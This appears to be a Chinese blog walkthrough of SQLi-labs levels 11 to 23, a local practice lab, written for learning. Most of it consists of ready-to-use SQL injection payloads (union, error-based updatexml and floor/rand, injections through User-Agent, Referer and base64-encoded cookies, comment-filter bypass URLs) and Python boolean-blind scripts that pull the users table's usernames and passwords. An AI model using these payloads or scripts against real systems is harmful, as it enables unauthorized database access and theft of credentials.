devbox
一键难忘520
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

网络安全之sql靶场(11-23)

作者:一键难忘520 | 2024-08-09 05:42:19

网络安全之sql靶场(11-23)

sql靶场(11-23)

目录

第十一关(post注入)

第十二关

第十三关

第十四关

第十五关

第十六关

第十七关

第十八关

第十九关

第二十关

第二十一关

第二十二关

第二十三关

第十一关(post注入)

查看页面

我们发现是有注入点的,所以我们可以尝试使用联合查询注入

我们发现联合查询注入是可行的,接下来就是该爆数据库、表、字段和用户账号密码

  1. aaa' union select 1,database()#
  2. aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
  3. aaa' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
  4. aaa' union select 1,group_concat(username ,0x3a , password) from users#

结果

第十二关

查看页面

尝试之后发现这一关和十一关只是闭合方式不同

  1. aaa") union select 1,database()#
  2. aaa") union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
  3. aaa") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
  4. aaa") union select 1,group_concat(username ,0x3a , password) from users#

结果

第十三关

查看页面,经过测试发现,只有报错注入可以回显,同时闭合方式也和之前有所不同。

  1. aaa') and updatexml(1,user(),1)#
  2. aaa') and updatexml(1,concat('~',(select database()),'~'),1)#
  3. aaa') and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
  4. aaa') and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
  5. aaa') and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#

由于只能显示一个字段,所以我们使用limit进行逐个输出(我这里只输出第一组用户名和密码,其余自己进行)

第十四关

查看页面,经过测试发现这一关和第十三关只是闭合方式不同,所以我们依旧需要使用报错注入进行注入

  1. aaa" and updatexml(1,user(),1)#
  2. aaa" and updatexml(1,concat('~',(select database()),'~'),1)#
  3. aaa" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
  4. aaa" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
  5. aaa" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#

结果

第十五关

查看页面,经过不断测试,发现页面只有成功与失败两个界面,所以我的第一想法就是布尔盲注

所以我们使用脚本直接爆出来这关

  1. import requests
  2.  
  3. #爆破数据库名
  4. # def inject_database(url):
  5. #     name = ''
  6. #     for i in range(1, 20):
  7. #         min_value = 32
  8. #         max_value = 128
  9. #         mid = (min_value + max_value) // 2
  10. #         while min_value < max_value:
  11. #             data = {
  12. #                 "uname": "aaaa' or ascii(substr(database(),%d,1))> %d#" % (i,mid),
  13. #                 "passwd": "aaa"
  14. #                     }
  15. #             r = requests.post(url=url, data=data)
  16. #             if "flag.jpg" in r.text:
  17. #                 min_value = mid + 1
  18. #             else:
  19. #                 max_value = mid
  20. #             mid = (min_value + max_value) // 2
  21. #         if mid == 32:
  22. #             break
  23. #         name += chr(mid)
  24. #         print(name)
  25. #     return name
  26.  
  27. #爆破表名
  28. # def inject_database(url):
  29. #     name = ''
  30. #     for i in range(1, 20):
  31. #         min_value = 32
  32. #         max_value = 128
  33. #         mid = (min_value + max_value) // 2
  34. #         while min_value < max_value:
  35. #             data = {
  36. #                 "uname": "aaa' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d#" % (i, mid),
  37. #                 "passwd": "aaa"
  38. #                     }
  39. #             r = requests.post(url=url, data=data)
  40. #             if "flag.jpg" in r.text:
  41. #                 min_value = mid + 1
  42. #             else:
  43. #                 max_value = mid
  44. #             mid = (min_value + max_value) // 2
  45. #         if mid == 32:
  46. #             break
  47. #         name += chr(mid)
  48. #         print(name)
  49. #     return name
  50.  
  51. #爆破列名
  52. # def inject_database(url):
  53. #     name = ''
  54. #     for i in range(1, 20):
  55. #         min_value = 32
  56. #         max_value = 128
  57. #         mid = (min_value + max_value) // 2
  58. #         while min_value < max_value:
  59. #             data = {
  60. #                 "uname": "aaa' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), %d, 1)) > %d#" % (i, mid),
  61. #                 "passwd": "aaa"
  62. #                     }
  63. #             r = requests.post(url=url, data=data)
  64. #             if "flag.jpg" in r.text:
  65. #                 min_value = mid + 1
  66. #             else:
  67. #                 max_value = mid
  68. #             mid = (min_value + max_value) // 2
  69. #         if mid == 32:
  70. #             break
  71. #         name += chr(mid)
  72. #         print(name)
  73. #     return name
  74.  
  75. #爆破用户和密码
  76. def inject_database(url):
  77.     name = ''
  78.     for i in range(1, 20):
  79.         min_value = 32
  80.         max_value = 128
  81.         mid = (min_value + max_value) // 2
  82.         while min_value < max_value:
  83.             data = {
  84.                 "uname": "aaa' or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d#" % (i, mid),
  85.                 "passwd": "aaa"
  86.                     }
  87.             r = requests.post(url=url, data=data)
  88.             if "flag.jpg" in r.text:
  89.                 min_value = mid + 1
  90.             else:
  91.                 max_value = mid
  92.             mid = (min_value + max_value) // 2
  93.         if mid == 32:
  94.             break
  95.         name += chr(mid)
  96.         print(name)
  97.     return name
  98.  
  99.  
  100. if __name__ == "__main__":
  101.     url = 'http://127.0.0.1/sqllabs/Less-15/'
  102.     inject_database(url)

结果

第十六关

查看页面发现这一关和第十五关只有闭合方式不一样

  1. import requests
  2.  
  3. #爆破数据库名
  4. # def inject_database(url):
  5. #     name = ''
  6. #     for i in range(1, 20):
  7. #         min_value = 32
  8. #         max_value = 128
  9. #         mid = (min_value + max_value) // 2
  10. #         while min_value < max_value:
  11. #             data = {
  12. #                 "uname": 'aaaa") or ascii(substr(database(),%d,1))> %d#' % (i,mid),
  13. #                 "passwd": "aaa"
  14. #                     }
  15. #             r = requests.post(url=url, data=data)
  16. #             if "flag.jpg" in r.text:
  17. #                 min_value = mid + 1
  18. #             else:
  19. #                 max_value = mid
  20. #             mid = (min_value + max_value) // 2
  21. #         if mid == 32:
  22. #             break
  23. #         name += chr(mid)
  24. #         print(name)
  25. #     return name
  26.  
  27. #爆破表名
  28. # def inject_database(url):
  29. #     name = ''
  30. #     for i in range(1, 20):
  31. #         min_value = 32
  32. #         max_value = 128
  33. #         mid = (min_value + max_value) // 2
  34. #         while min_value < max_value:
  35. #             data = {
  36. #                 "uname": 'aaa") or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="security"), %d, 1)) > %d#' % (i, mid),
  37. #                 "passwd": "aaa"
  38. #                     }
  39. #             r = requests.post(url=url, data=data)
  40. #             if "flag.jpg" in r.text:
  41. #                 min_value = mid + 1
  42. #             else:
  43. #                 max_value = mid
  44. #             mid = (min_value + max_value) // 2
  45. #         if mid == 32:
  46. #             break
  47. #         name += chr(mid)
  48. #         print(name)
  49. #     return name
  50.  
  51. #爆破列名
  52. # def inject_database(url):
  53. #     name = ''
  54. #     for i in range(1, 20):
  55. #         min_value = 32
  56. #         max_value = 128
  57. #         mid = (min_value + max_value) // 2
  58. #         while min_value < max_value:
  59. #             data = {
  60. #                 "uname": 'aaa") or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users"), %d, 1)) > %d#' % (i, mid),
  61. #                 "passwd": "aaa"
  62. #                     }
  63. #             r = requests.post(url=url, data=data)
  64. #             if "flag.jpg" in r.text:
  65. #                 min_value = mid + 1
  66. #             else:
  67. #                 max_value = mid
  68. #             mid = (min_value + max_value) // 2
  69. #         if mid == 32:
  70. #             break
  71. #         name += chr(mid)
  72. #         print(name)
  73. #     return name
  74.  
  75. #爆破用户和密码
  76. def inject_database(url):
  77.     name = ''
  78.     for i in range(1, 20):
  79.         min_value = 32
  80.         max_value = 128
  81.         mid = (min_value + max_value) // 2
  82.         while min_value < max_value:
  83.             data = {
  84.                 "uname": 'aaa") or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d#' % (i, mid),
  85.                 "passwd": 'aaa'
  86.                     }
  87.             r = requests.post(url=url, data=data)
  88.             if "flag.jpg" in r.text:
  89.                 min_value = mid + 1
  90.             else:
  91.                 max_value = mid
  92.             mid = (min_value + max_value) // 2
  93.         if mid == 32:
  94.             break
  95.         name += chr(mid)
  96.         print(name)
  97.     return name
  98.  
  99.  
  100. if __name__ == "__main__":
  101.     url = 'http://127.0.0.1/sqllabs/Less-16/'
  102.     inject_database(url)

结果

第十七关

这一关查看源码后发现,username不能进行注入了,但是password依然可以进行注入,但是这就有一个前提条件就是username必须输入正确。可以这一关的页面后发现这一关其实就是改密码,既然是改密码那么你就必须知道用户名了

证明我的想法是正确的,就是在密码这里进行注入

  1. aaa' and updatexml(1,user(),1)#
  2. aaa' and updatexml(1,concat('~',(select database()),'~'),1)#
  3. 1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
  4. 1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
  5. 1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)#

结果

很明显,成功爆出来用户名和密码啦,想要继续爆就修改limit后面的参数就可以啦。

第十八关

查看页面

这一关经过测试感觉和之前的有些区别啦,这时候我分析源码后发现注入点在user-agent上,所以我们可以试着抓包进行注入(使用抓包工具burpsuite进行抓包)

首先使用proxy模块进行抓包,抓取后发送到repeater模块进行分析修改

很明显可以看出来有注入点啦

  1. aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
  2.  
  3. aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
  4.  
  5. 1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
  6.  
  7. 1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1
  8.  
  9. 1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  10.

很明显成功爆出来了他的用户名和密码。

第十九关

查看页面,感觉这一关和十八关有些类似

我直接进行了抓包,通过不断测试,发现注入点在referer上面

那么我就可以直接注入了

  1. aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
  2.  
  3. aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
  4.  
  5. 1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
  6.  
  7. 1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1
  8.  
  9. 1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  10.

结果

第二十关

查看页面并登录成功后发现cookie在页面中有点突出

所以直接抓包修改cookie看是不是注入点,结果显而易见是注入点

  1. aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
  2.  
  3. aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
  4.  
  5. 1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
  6.  
  7. 1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1
  8.  
  9. admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  10.

结果

第二十一关

查看页面并成功登录后发现页面cookie进行了编码

那么我有理由猜测吧payload进行编码再注入,会不会爆出东西呢,试一试,

看来我猜测是没错,那么接下来就是把payload语句进行base64编码后在进行注入,这里不得不说burpsuite的优势了,自带编码模块(感觉挺爽得啦),payload放下面啦,自己进行编码吧

  1. aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
  2.  
  3. aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='1
  4.  
  5. 1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
  6.  
  7. 1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1
  8.  
  9. admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
  10.

结果

第二十二关

查看页面并成功登录后发现页面的cookie依然进行了编码,那我有理由怀疑是不是闭合方式变了呢,直接试一试

因为这个也是需要进行base64编码,自己进行编码

  1. aaa" and updatexml(1,concat(0x7e,(select user()),0x7e),1) and "1"="1
  2.  
  3. aaa" and updatexml(1,concat('~',(select database()),'~'),1) and '1'="1
  4.  
  5. 1" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'="1
  6.  
  7. 1" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'="1
  8.  
  9. admin" and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'="1
  10.

结果

第二十三关

查看页面后发现这一关又回到了我们的老朋友GET传参啦

试过好多后无从下手,解读源代码后发现这一关进行了过滤,

想了一下,既然过滤了注释符,娜美我们直接进行闭合试一试

经过测试发现我的想法是可行的,

那么进行全过程是爆破吧

  1. 爆表
  2. http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%27security%27%20and%20%271%27=%271
  3.  
  4. 爆字段
  5. http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20%271%27=%271
  6.  
  7. 爆用户和密码
  8. http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(username%20,0x3a%20,%20password)%20from%20users%20where%20%271%27=%271

结果

接下来的24关我会放在单独的一片文档中,因为24关事二次注入,所以我还会引入两个ctf的二次注入

本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号